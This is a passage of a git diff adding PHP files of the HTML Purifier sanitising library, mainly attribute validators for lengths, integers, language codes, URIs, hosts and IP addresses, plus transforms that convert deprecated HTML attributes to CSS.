(ctype_alpha($id)) { + $result = true; + } else { + if (!ctype_alpha(@$id[0])) return false; + $trim = trim( // primitive style of regexps, I suppose + $id, + 'A..Za..z0..9:-._' + ); + $result = ($trim === ''); + } + + $regexp = $config->get('Attr.IDBlacklistRegexp'); + if ($regexp && preg_match($regexp, $id)) { + return false; + } + + if (!$this->selector && $result) $id_accumulator->add($id); + + // if no change was made to the ID, return the result + // else, return the new id if stripping whitespace made it + // valid, or return false. + return $result ? $id : false; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Length.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Length.php new file mode 100644 index 000000000..a242f9c23 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Length.php @@ -0,0 +1,41 @@ +<?php + +/** + * Validates the HTML type length (not to be confused with CSS's length). + * + * This accepts integer pixels or percentages as lengths for certain + * HTML attributes. + */ + +class HTMLPurifier_AttrDef_HTML_Length extends HTMLPurifier_AttrDef_HTML_Pixels +{ + + public function validate($string, $config, $context) { + + $string = trim($string); + if ($string === '') return false; + + $parent_result = parent::validate($string, $config, $context); + if ($parent_result !== false) return $parent_result; + + $length = strlen($string); + $last_char = $string[$length - 1]; + + if ($last_char !== '%') return false; + + $points = substr($string, 0, $length - 1); + + if (!is_numeric($points)) return false; + + $points = (int) $points; + + if ($points < 0) return '0%'; + if ($points > 100) return '100%'; + + return ((string) $points) . '%'; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/LinkTypes.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/LinkTypes.php new file mode 100644 index 000000000..76d25ed08 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/LinkTypes.php @@ -0,0 +1,53 @@ +<?php + +/** + * Validates a rel/rev link attribute against a directive of allowed values + * @note We cannot use Enum because link types allow multiple + * values. + * @note Assumes link types are ASCII text + */ +class HTMLPurifier_AttrDef_HTML_LinkTypes extends HTMLPurifier_AttrDef +{ + + /** Name config attribute to pull. */ + protected $name; + + public function __construct($name) { + $configLookup = array( + 'rel' => 'AllowedRel', + 'rev' => 'AllowedRev' + ); + if (!isset($configLookup[$name])) { + trigger_error('Unrecognized attribute name for link '. + 'relationship.', E_USER_ERROR); + return; + } + $this->name = $configLookup[$name]; + } + + public function validate($string, $config, $context) { + + $allowed = $config->get('Attr.' . $this->name); + if (empty($allowed)) return false; + + $string = $this->parseCDATA($string); + $parts = explode(' ', $string); + + // lookup to prevent duplicates + $ret_lookup = array(); + foreach ($parts as $part) { + $part = strtolower(trim($part)); + if (!isset($allowed[$part])) continue; + $ret_lookup[$part] = true; + } + + if (empty($ret_lookup)) return false; + $string = implode(' ', array_keys($ret_lookup)); + + return $string; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/MultiLength.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/MultiLength.php new file mode 100644 index 000000000..c72fc76e4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/MultiLength.php @@ -0,0 +1,41 @@ +<?php + +/** + * Validates a MultiLength as defined by the HTML spec. + * + * A multilength is either a integer (pixel count), a percentage, or + * a relative number. + */ +class HTMLPurifier_AttrDef_HTML_MultiLength extends HTMLPurifier_AttrDef_HTML_Length +{ + + public function validate($string, $config, $context) { + + $string = trim($string); + if ($string === '') return false; + + $parent_result = parent::validate($string, $config, $context); + if ($parent_result !== false) return $parent_result; + + $length = strlen($string); + $last_char = $string[$length - 1]; + + if ($last_char !== '*') return false; + + $int = substr($string, 0, $length - 1); + + if ($int == '') return '*'; + if (!is_numeric($int)) return false; + + $int = (int) $int; + + if ($int < 0) return false; + if ($int == 0) return '0'; + if ($int == 1) return '*'; + return ((string) $int) . '*'; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Nmtokens.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Nmtokens.php new file mode 100644 index 000000000..aa34120bd --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Nmtokens.php @@ -0,0 +1,52 @@ +<?php + +/** + * Validates contents based on NMTOKENS attribute type. + */ +class HTMLPurifier_AttrDef_HTML_Nmtokens extends HTMLPurifier_AttrDef +{ + + public function validate($string, $config, $context) { + + $string = trim($string); + + // early abort: '' and '0' (strings that convert to false) are invalid + if (!$string) return false; + + $tokens = $this->split($string, $config, $context); + $tokens = $this->filter($tokens, $config, $context); + if (empty($tokens)) return false; + return implode(' ', $tokens); + + } + + /** + * Splits a space separated list of tokens into its constituent parts. + */ + protected function split($string, $config, $context) { + // OPTIMIZABLE! + // do the preg_match, capture all subpatterns for reformulation + + // we don't support U+00A1 and up codepoints or + // escaping because I don't know how to do that with regexps + // and plus it would complicate optimization efforts (you never + // see that anyway). + $pattern = '/(?:(?<=\s)|\A)'. // look behind for space or string start + '((?:--|-?[A-Za-z_])[A-Za-z_\-0-9]*)'. + '(?:(?=\s)|\z)/'; // look ahead for space or string end + preg_match_all($pattern, $string, $matches); + return $matches[1]; + } + + /** + * Template method for removing certain tokens based on arbitrary criteria. + * @note If we wanted to be really functional, we'd do an array_filter + * with a callback. But... we're not. + */ + protected function filter($tokens, $config, $context) { + return $tokens; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Pixels.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Pixels.php new file mode 100644 index 000000000..4cb2c1b85 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Pixels.php @@ -0,0 +1,48 @@ +<?php + +/** + * Validates an integer representation of pixels according to the HTML spec. + */ +class HTMLPurifier_AttrDef_HTML_Pixels extends HTMLPurifier_AttrDef +{ + + protected $max; + + public function __construct($max = null) { + $this->max = $max; + } + + public function validate($string, $config, $context) { + + $string = trim($string); + if ($string === '0') return $string; + if ($string === '') return false; + $length = strlen($string); + if (substr($string, $length - 2) == 'px') { + $string = substr($string, 0, $length - 2); + } + if (!is_numeric($string)) return false; + $int = (int) $string; + + if ($int < 0) return '0'; + + // upper-bound value, extremely high values can + // crash operating systems, see <http://ha.ckers.org/imagecrash.html> + // WARNING, above link WILL crash you if you're using Windows + + if ($this->max !== null && $int > $this->max) return (string) $this->max; + + return (string) $int; + + } + + public function make($string) { + if ($string === '') $max = null; + else $max = (int) $string; + $class = get_class($this); + return new $class($max); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Integer.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Integer.php new file mode 100644 index 000000000..d59738d2a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Integer.php @@ -0,0 +1,73 @@ +<?php + +/** + * Validates an integer. + * @note While this class was modeled off the CSS definition, no currently + * allowed CSS uses this type. The properties that do are: widows, + * orphans, z-index, counter-increment, counter-reset. Some of the + * HTML attributes, however, find use for a non-negative version of this. + */ +class HTMLPurifier_AttrDef_Integer extends HTMLPurifier_AttrDef +{ + + /** + * Bool indicating whether or not negative values are allowed + */ + protected $negative = true; + + /** + * Bool indicating whether or not zero is allowed + */ + protected $zero = true; + + /** + * Bool indicating whether or not positive values are allowed + */ + protected $positive = true; + + /** + * @param $negative Bool indicating whether or not negative values are allowed + * @param $zero Bool indicating whether or not zero is allowed + * @param $positive Bool indicating whether or not positive values are allowed + */ + public function __construct( + $negative = true, $zero = true, $positive = true + ) { + $this->negative = $negative; + $this->zero = $zero; + $this->positive = $positive; + } + + public function validate($integer, $config, $context) { + + $integer = $this->parseCDATA($integer); + if ($integer === '') return false; + + // we could possibly simply typecast it to integer, but there are + // certain fringe cases that must not return an integer. + + // clip leading sign + if ( $this->negative && $integer[0] === '-' ) { + $digits = substr($integer, 1); + if ($digits === '0') $integer = '0'; // rm minus sign for zero + } elseif( $this->positive && $integer[0] === '+' ) { + $digits = $integer = substr($integer, 1); // rm unnecessary plus + } else { + $digits = $integer; + } + + // test if it's numeric + if (!ctype_digit($digits)) return false; + + // perform scope tests + if (!$this->zero && $integer == 0) return false; + if (!$this->positive && $integer > 0) return false; + if (!$this->negative && $integer < 0) return false; + + return $integer; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Lang.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Lang.php new file mode 100644 index 000000000..10e6da56d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Lang.php @@ -0,0 +1,73 @@ +<?php + +/** + * Validates the HTML attribute lang, effectively a language code. + * @note Built according to RFC 3066, which obsoleted RFC 1766 + */ +class HTMLPurifier_AttrDef_Lang extends HTMLPurifier_AttrDef +{ + + public function validate($string, $config, $context) { + + $string = trim($string); + if (!$string) return false; + + $subtags = explode('-', $string); + $num_subtags = count($subtags); + + if ($num_subtags == 0) return false; // sanity check + + // process primary subtag : $subtags[0] + $length = strlen($subtags[0]); + switch ($length) { + case 0: + return false; + case 1: + if (! ($subtags[0] == 'x' || $subtags[0] == 'i') ) { + return false; + } + break; + case 2: + case 3: + if (! ctype_alpha($subtags[0]) ) { + return false; + } elseif (! ctype_lower($subtags[0]) ) { + $subtags[0] = strtolower($subtags[0]); + } + break; + default: + return false; + } + + $new_string = $subtags[0]; + if ($num_subtags == 1) return $new_string; + + // process second subtag : $subtags[1] + $length = strlen($subtags[1]); + if ($length == 0 || ($length == 1 && $subtags[1] != 'x') || $length > 8 || !ctype_alnum($subtags[1])) { + return $new_string; + } + if (!ctype_lower($subtags[1])) $subtags[1] = strtolower($subtags[1]); + + $new_string .= '-' . $subtags[1]; + if ($num_subtags == 2) return $new_string; + + // process all other subtags, index 2 and up + for ($i = 2; $i < $num_subtags; $i++) { + $length = strlen($subtags[$i]); + if ($length == 0 || $length > 8 || !ctype_alnum($subtags[$i])) { + return $new_string; + } + if (!ctype_lower($subtags[$i])) { + $subtags[$i] = strtolower($subtags[$i]); + } + $new_string .= '-' . $subtags[$i]; + } + + return $new_string; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Switch.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Switch.php new file mode 100644 index 000000000..c9e3ed193 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Switch.php @@ -0,0 +1,34 @@ +<?php + +/** + * Decorator that, depending on a token, switches between two definitions. + */ +class HTMLPurifier_AttrDef_Switch +{ + + protected $tag; + protected $withTag, $withoutTag; + + /** + * @param string $tag Tag name to switch upon + * @param HTMLPurifier_AttrDef $with_tag Call if token matches tag + * @param HTMLPurifier_AttrDef $without_tag Call if token doesn't match, or there is no token + */ + public function __construct($tag, $with_tag, $without_tag) { + $this->tag = $tag; + $this->withTag = $with_tag; + $this->withoutTag = $without_tag; + } + + public function validate($string, $config, $context) { + $token = $context->get('CurrentToken', true); + if (!$token || $token->name !== $this->tag) { + return $this->withoutTag->validate($string, $config, $context); + } else { + return $this->withTag->validate($string, $config, $context); + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Text.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Text.php new file mode 100644 index 000000000..c6216cc53 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Text.php @@ -0,0 +1,15 @@ +<?php + +/** + * Validates arbitrary text according to the HTML spec. + */ +class HTMLPurifier_AttrDef_Text extends HTMLPurifier_AttrDef +{ + + public function validate($string, $config, $context) { + return $this->parseCDATA($string); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI.php new file mode 100644 index 000000000..c2b684671 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI.php @@ -0,0 +1,77 @@ +<?php + +/** + * Validates a URI as defined by RFC 3986. + * @note Scheme-specific mechanics deferred to HTMLPurifier_URIScheme + */ +class HTMLPurifier_AttrDef_URI extends HTMLPurifier_AttrDef +{ + + protected $parser; + protected $embedsResource; + + /** + * @param $embeds_resource_resource Does the URI here result in an extra HTTP request? + */ + public function __construct($embeds_resource = false) { + $this->parser = new HTMLPurifier_URIParser(); + $this->embedsResource = (bool) $embeds_resource; + } + + public function make($string) { + $embeds = ($string === 'embedded'); + return new HTMLPurifier_AttrDef_URI($embeds); + } + + public function validate($uri, $config, $context) { + + if ($config->get('URI.Disable')) return false; + + $uri = $this->parseCDATA($uri); + + // parse the URI + $uri = $this->parser->parse($uri); + if ($uri === false) return false; + + // add embedded flag to context for validators + $context->register('EmbeddedURI', $this->embedsResource); + + $ok = false; + do { + + // generic validation + $result = $uri->validate($config, $context); + if (!$result) break; + + // chained filtering + $uri_def = $config->getDefinition('URI'); + $result = $uri_def->filter($uri, $config, $context); + if (!$result) break; + + // scheme-specific validation + $scheme_obj = $uri->getSchemeObj($config, $context); + if (!$scheme_obj) break; + if ($this->embedsResource && !$scheme_obj->browsable) break; + $result = $scheme_obj->validate($uri, $config, $context); + if (!$result) break; + + // Post chained filtering + $result = $uri_def->postFilter($uri, $config, $context); + if (!$result) break; + + // survived gauntlet + $ok = true; + + } while (false); + + $context->destroy('EmbeddedURI'); + if (!$ok) return false; + + // back to string + return $uri->toString(); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email.php new file mode 100644 index 000000000..bfee9d166 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email.php @@ -0,0 +1,17 @@ +<?php + +abstract class HTMLPurifier_AttrDef_URI_Email extends HTMLPurifier_AttrDef +{ + + /** + * Unpacks a mailbox into its display-name and address + */ + function unpack($string) { + // needs to be implemented + } + +} + +// sub-implementations + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php new file mode 100644 index 000000000..94c715ab4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php @@ -0,0 +1,21 @@ +<?php + +/** + * Primitive email validation class based on the regexp found at + * http://www.regular-expressions.info/email.html + */ +class HTMLPurifier_AttrDef_URI_Email_SimpleCheck extends HTMLPurifier_AttrDef_URI_Email +{ + + public function validate($string, $config, $context) { + // no support for named mailboxes i.e. "Bob <bob@example.com>" + // that needs more percent encoding to be done + if ($string == '') return false; + $string = trim($string); + $result = preg_match('/^[A-Z0-9._%-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i', $string); + return $result ? $string : false; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Host.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Host.php new file mode 100644 index 000000000..125decb2d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/Host.php @@ -0,0 +1,101 @@ +<?php + +/** + * Validates a host according to the IPv4, IPv6 and DNS (future) specifications. + */ +class HTMLPurifier_AttrDef_URI_Host extends HTMLPurifier_AttrDef +{ + + /** + * Instance of HTMLPurifier_AttrDef_URI_IPv4 sub-validator + */ + protected $ipv4; + + /** + * Instance of HTMLPurifier_AttrDef_URI_IPv6 sub-validator + */ + protected $ipv6; + + public function __construct() { + $this->ipv4 = new HTMLPurifier_AttrDef_URI_IPv4(); + $this->ipv6 = new HTMLPurifier_AttrDef_URI_IPv6(); + } + + public function validate($string, $config, $context) { + $length = strlen($string); + // empty hostname is OK; it's usually semantically equivalent: + // the default host as defined by a URI scheme is used: + // + // If the URI scheme defines a default for host, then that + // default applies when the host subcomponent is undefined + // or when the registered name is empty (zero length). + if ($string === '') return ''; + if ($length > 1 && $string[0] === '[' && $string[$length-1] === ']') { + //IPv6 + $ip = substr($string, 1, $length - 2); + $valid = $this->ipv6->validate($ip, $config, $context); + if ($valid === false) return false; + return '['. $valid . ']'; + } + + // need to do checks on unusual encodings too + $ipv4 = $this->ipv4->validate($string, $config, $context); + if ($ipv4 !== false) return $ipv4; + + // A regular domain name. + + // This doesn't match I18N domain names, but we don't have proper IRI support, + // so force users to insert Punycode. + + // The productions describing this are: + $a = '[a-z]'; // alpha + $an = '[a-z0-9]'; // alphanum + $and = '[a-z0-9-]'; // alphanum | "-" + // domainlabel = alphanum | alphanum *( alphanum | "-" ) alphanum + $domainlabel = "$an($and*$an)?"; + // toplabel = alpha | alpha *( alphanum | "-" ) alphanum + $toplabel = "$a($and*$an)?"; + // hostname = *( domainlabel "." ) toplabel [ "." ] + if (preg_match("/^($domainlabel\.)*$toplabel\.?$/i", $string)) { + return $string; + } + + // If we have Net_IDNA2 support, we can support IRIs by + // punycoding them. (This is the most portable thing to do, + // since otherwise we have to assume browsers support + + if ($config->get('Core.EnableIDNA')) { + $idna = new Net_IDNA2(array('encoding' => 'utf8', 'overlong' => false, 'strict' => true)); + // we need to encode each period separately + $parts = explode('.', $string); + try { + $new_parts = array(); + foreach ($parts as $part) { + $encodable = false; + for ($i = 0, $c = strlen($part); $i < $c; $i++) { + if (ord($part[$i]) > 0x7a) { + $encodable = true; + break; + } + } + if (!$encodable) { + $new_parts[] = $part; + } else { + $new_parts[] = $idna->encode($part); + } + } + $string = implode('.', $new_parts); + if (preg_match("/^($domainlabel\.)*$toplabel\.?$/i", $string)) { + return $string; + } + } catch (Exception $e) { + // XXX error reporting + } + } + + return false; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv4.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv4.php new file mode 100644 index 000000000..ec4cf591b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv4.php @@ -0,0 +1,39 @@ +<?php + +/** + * Validates an IPv4 address + * @author Feyd @ forums.devnetwork.net (public domain) + */ +class HTMLPurifier_AttrDef_URI_IPv4 extends HTMLPurifier_AttrDef +{ + + /** + * IPv4 regex, protected so that IPv6 can reuse it + */ + protected $ip4; + + public function validate($aIP, $config, $context) { + + if (!$this->ip4) $this->_loadRegex(); + + if (preg_match('#^' . $this->ip4 . '$#s', $aIP)) + { + return $aIP; + } + + return false; + + } + + /** + * Lazy load function to prevent regex from being stuffed in + * cache. + */ + protected function _loadRegex() { + $oct = '(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9][0-9]|[0-9])'; // 0-255 + $this->ip4 = "(?:{$oct}\\.{$oct}\\.{$oct}\\.{$oct})"; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv6.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv6.php new file mode 100644 index 000000000..9454e9be5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/URI/IPv6.php @@ -0,0 +1,99 @@ +<?php + +/** + * Validates an IPv6 address. + * @author Feyd @ forums.devnetwork.net (public domain) + * @note This function requires brackets to have been removed from address + * in URI. + */ +class HTMLPurifier_AttrDef_URI_IPv6 extends HTMLPurifier_AttrDef_URI_IPv4 +{ + + public function validate($aIP, $config, $context) { + + if (!$this->ip4) $this->_loadRegex(); + + $original = $aIP; + + $hex = '[0-9a-fA-F]'; + $blk = '(?:' . $hex . '{1,4})'; + $pre = '(?:/(?:12[0-8]|1[0-1][0-9]|[1-9][0-9]|[0-9]))'; // /0 - /128 + + // prefix check + if (strpos($aIP, '/') !== false) + { + if (preg_match('#' . $pre . '$#s', $aIP, $find)) + { + $aIP = substr($aIP, 0, 0-strlen($find[0])); + unset($find); + } + else + { + return false; + } + } + + // IPv4-compatiblity check + if (preg_match('#(?<=:'.')' . $this->ip4 . '$#s', $aIP, $find)) + { + $aIP = substr($aIP, 0, 0-strlen($find[0])); + $ip = explode('.', $find[0]); + $ip = array_map('dechex', $ip); + $aIP .= $ip[0] . $ip[1] . ':' . $ip[2] . $ip[3]; + unset($find, $ip); + } + + // compression check + $aIP = explode('::', $aIP); + $c = count($aIP); + if ($c > 2) + { + return false; + } + elseif ($c == 2) + { + list($first, $second) = $aIP; + $first = explode(':', $first); + $second = explode(':', $second); + + if (count($first) + count($second) > 8) + { + return false; + } + + while(count($first) < 8) + { + array_push($first, '0'); + } + + array_splice($first, 8 - count($second), 8, $second); + $aIP = $first; + unset($first,$second); + } + else + { + $aIP = explode(':', $aIP[0]); + } + $c = count($aIP); + + if ($c != 8) + { + return false; + } + + // All the pieces should be 16-bit hex strings. Are they? + foreach ($aIP as $piece) + { + if (!preg_match('#^[0-9a-fA-F]{4}$#s', sprintf('%04s', $piece))) + { + return false; + } + } + + return $original; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform.php new file mode 100644 index 000000000..e61d3e01b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform.php @@ -0,0 +1,56 @@ +<?php + +/** + * Processes an entire attribute array for corrections needing multiple values. + * + * Occasionally, a certain attribute will need to be removed and popped onto + * another value. Instead of creating a complex return syntax for + * HTMLPurifier_AttrDef, we just pass the whole attribute array to a + * specialized object and have that do the special work. That is the + * family of HTMLPurifier_AttrTransform. + * + * An attribute transformation can be assigned to run before or after + * HTMLPurifier_AttrDef validation. See HTMLPurifier_HTMLDefinition for + * more details. + */ + +abstract class HTMLPurifier_AttrTransform +{ + + /** + * Abstract: makes changes to the attributes dependent on multiple values. + * + * @param $attr Assoc array of attributes, usually from + * HTMLPurifier_Token_Tag::$attr + * @param $config Mandatory HTMLPurifier_Config object. + * @param $context Mandatory HTMLPurifier_Context object + * @returns Processed attribute array. + */ + abstract public function transform($attr, $config, $context); + + /** + * Prepends CSS properties to the style attribute, creating the + * attribute if it doesn't exist. + * @param $attr Attribute array to process (passed by reference) + * @param $css CSS to prepend + */ + public function prependCSS(&$attr, $css) { + $attr['style'] = isset($attr['style']) ? $attr['style'] : ''; + $attr['style'] = $css . $attr['style']; + } + + /** + * Retrieves and removes an attribute + * @param $attr Attribute array to process (passed by reference) + * @param $key Key of attribute to confiscate + */ + public function confiscateAttr(&$attr, $key) { + if (!isset($attr[$key])) return null; + $value = $attr[$key]; + unset($attr[$key]); + return $value; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Background.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Background.php new file mode 100644 index 000000000..0e1ff24a3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Background.php @@ -0,0 +1,23 @@ +<?php + +/** + * Pre-transform that changes proprietary background attribute to CSS. + */ +class HTMLPurifier_AttrTransform_Background extends HTMLPurifier_AttrTransform { + + public function transform($attr, $config, $context) { + + if (!isset($attr['background'])) return $attr; + + $background = $this->confiscateAttr($attr, 'background'); + // some validation should happen here + + $this->prependCSS($attr, "background-image:url($background);"); + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BdoDir.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BdoDir.php new file mode 100644 index 000000000..4d1a05665 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BdoDir.php @@ -0,0 +1,19 @@ +<?php + +// this MUST be placed in post, as it assumes that any value in dir is valid + +/** + * Post-trasnform that ensures that bdo tags have the dir attribute set. + */ +class HTMLPurifier_AttrTransform_BdoDir extends HTMLPurifier_AttrTransform +{ + + public function transform($attr, $config, $context) { + if (isset($attr['dir'])) return $attr; + $attr['dir'] = $config->get('Attr.DefaultTextDir'); + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BgColor.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BgColor.php new file mode 100644 index 000000000..ad3916bb9 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BgColor.php @@ -0,0 +1,23 @@ +<?php + +/** + * Pre-transform that changes deprecated bgcolor attribute to CSS. + */ +class HTMLPurifier_AttrTransform_BgColor extends HTMLPurifier_AttrTransform { + + public function transform($attr, $config, $context) { + + if (!isset($attr['bgcolor'])) return $attr; + + $bgcolor = $this->confiscateAttr($attr, 'bgcolor'); + // some validation should happen here + + $this->prependCSS($attr, "background-color:$bgcolor;"); + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BoolToCSS.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BoolToCSS.php new file mode 100644 index 000000000..51159b671 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/BoolToCSS.php @@ -0,0 +1,36 @@ +<?php + +/** + * Pre-transform that changes converts a boolean attribute to fixed CSS + */ +class HTMLPurifier_AttrTransform_BoolToCSS extends HTMLPurifier_AttrTransform { + + /** + * Name of boolean attribute that is trigger + */ + protected $attr; + + /** + * CSS declarations to add to style, needs trailing semicolon + */ + protected $css; + + /** + * @param $attr string attribute name to convert from + * @param $css string CSS declarations to add to style (needs semicolon) + */ + public function __construct($attr, $css) { + $this->attr = $attr; + $this->css = $css; + } + + public function transform($attr, $config, $context) { + if (!isset($attr[$this->attr])) return $attr; + unset($attr[$this->attr]); + $this->prependCSS($attr, $this->css); + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Border.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Border.php new file mode 100644 index 000000000..476b0b079 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Border.php @@ -0,0 +1,18 @@ +<?php + +/** + * Pre-transform that changes deprecated border attribute to CSS. + */ +class HTMLPurifier_AttrTransform_Border extends HTMLPurifier_AttrTransform { + + public function transform($attr, $config, $context) { + if (!isset($attr['border'])) return $attr; + $border_width = $this->confiscateAttr($attr, 'border'); + // some validation should happen here + $this->prependCSS($attr, "border:{$border_width}px solid;"); + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/EnumToCSS.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/EnumToCSS.php new file mode 100644 index 000000000..2a5b4514a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/EnumToCSS.php @@ -0,0 +1,58 @@ +<?php + +/** + * Generic pre-transform that converts an attribute with a fixed number of + * values (enumerated) to CSS. + */ +class HTMLPurifier_AttrTransform_EnumToCSS extends HTMLPurifier_AttrTransform { + + /** + * Name of attribute to transform from + */ + protected $attr; + + /** + * Lookup array of attribute values to CSS + */ + protected $enumToCSS = array(); + + /** + * Case sensitivity of the matching + * @warning Currently can only be guaranteed to work with ASCII + * values. + */ + protected $caseSensitive = false; + + /** + * @param $attr String attribute name to transform from + * @param $enumToCSS Lookup array of attribute values to CSS + * @param $case_sensitive Boolean case sensitivity indicator, default false + */ + public function __construct($attr, $enum_to_css, $case_sensitive = false) { + $this->attr = $attr; + $this->enumToCSS = $enum_to_css; + $this->caseSensitive = (bool) $case_sensitive; + } + + public function transform($attr, $config, $context) { + + if (!isset($attr[$this->attr])) return $attr; + + $value = trim($attr[$this->attr]); + unset($attr[$this->attr]); + + if (!$this->caseSensitive) $value = strtolower($value); + + if (!isset($this->enumToCSS[$value])) { + return $attr; + } + + $this->prependCSS($attr, $this->enumToCSS[$value]); + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgRequired.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgRequired.php new file mode 100644 index 000000000..7f0e4b7a5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgRequired.php @@ -0,0 +1,43 @@ +<?php + +// must be called POST validation + +/** + * Transform that supplies default values for the src and alt attributes + * in img tags, as well as prevents the img tag from being removed + * because of a missing alt tag. This needs to be registered as both + * a pre and post attribute transform. + */ +class HTMLPurifier_AttrTransform_ImgRequired extends HTMLPurifier_AttrTransform +{ + + public function transform($attr, $config, $context) { + + $src = true; + if (!isset($attr['src'])) { + if ($config->get('Core.RemoveInvalidImg')) return $attr; + $attr['src'] = $config->get('Attr.DefaultInvalidImage'); + $src = false; + } + + if (!isset($attr['alt'])) { + if ($src) { + $alt = $config->get('Attr.DefaultImageAlt'); + if ($alt === null) { + // truncate if the alt is too long + $attr['alt'] = substr(basename($attr['src']),0,40); + } else { + $attr['alt'] = $alt; + } + } else { + $attr['alt'] = $config->get('Attr.DefaultInvalidImageAlt'); + } + } + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgSpace.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgSpace.php new file mode 100644 index 